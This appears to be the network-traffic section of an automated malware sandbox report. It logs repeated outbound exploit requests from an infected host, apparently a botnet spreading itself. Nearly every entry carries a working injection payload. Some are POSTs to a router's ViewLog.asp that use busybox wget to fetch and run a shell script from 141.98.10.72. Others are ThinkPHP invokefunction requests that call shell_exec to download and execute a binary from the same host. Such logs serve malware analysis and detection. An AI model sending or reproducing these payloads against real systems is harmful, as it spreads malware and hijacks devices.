                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:14.680917025 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:36.437972069 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:17.392188072 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            453192.168.2.234989685.247.81.1718080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:54.696105957 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            454192.168.2.234931694.121.113.1198080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:54.733553886 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            455192.168.2.233711494.26.48.978080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:54.830169916 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            456192.168.2.234392095.38.75.7880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:54.999430895 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:55.318111897 CET330INHTTP/1.0 400 Bad Request
                                                            Cache-Control: no-store
                                                            Connection: close
                                                            Content-Length: 129
                                                            Date: Wed, 14 Feb 2024 08:28:55 GMT
                                                            Expires: 0
                                                            Pragma: no-cache
                                                            X-Frame-Options: sameorigin
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!doctype html><html><head><title>Error 400: Bad Request</title></head><body><h1>Error 400: Bad Request</h1></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            457192.168.2.234464895.179.188.9180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:55.202511072 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:56.283504963 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:56.482384920 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:28:56 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            458192.168.2.234389694.122.115.1328080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:55.229111910 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            459192.168.2.233381294.121.33.2528080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:55.229202032 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            460192.168.2.235829494.121.126.118080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:55.229672909 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            461192.168.2.235151294.120.231.668080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:55.230931997 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            462192.168.2.234810495.6.13.18180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:55.247483015 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:55.502706051 CET383INHTTP/1.1 404 Not Found
                                                            Server: micro_httpd
                                                            Cache-Control: no-cache
                                                            Date: Wed, 14 Feb 2024 11:28:54 GMT
                                                            Content-Type: text/html
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            463192.168.2.233285095.0.133.23680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:55.256035089 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:56.603435040 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:58.171281099 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:01.370858908 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:07.773947001 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:20.312180996 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:46.676508904 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:30:37.869411945 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            464192.168.2.234772294.120.169.1098080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:57.751972914 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            465192.168.2.235301894.110.115.1828080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:57.755856037 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            466192.168.2.2350220112.213.32.14880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:57.839426041 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:58.147428036 CET503INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:28:57 GMT
                                                            Server: Apache/2.4.29 (Ubuntu)
                                                            Content-Length: 309
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 6f 77 6e 64 72 61 66 74 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.bowndraft.com Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            467192.168.2.235999231.136.248.2068080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:57.958395958 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:58.587255001 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:59.834986925 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:02.394644022 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:07.513900042 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:17.496542931 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
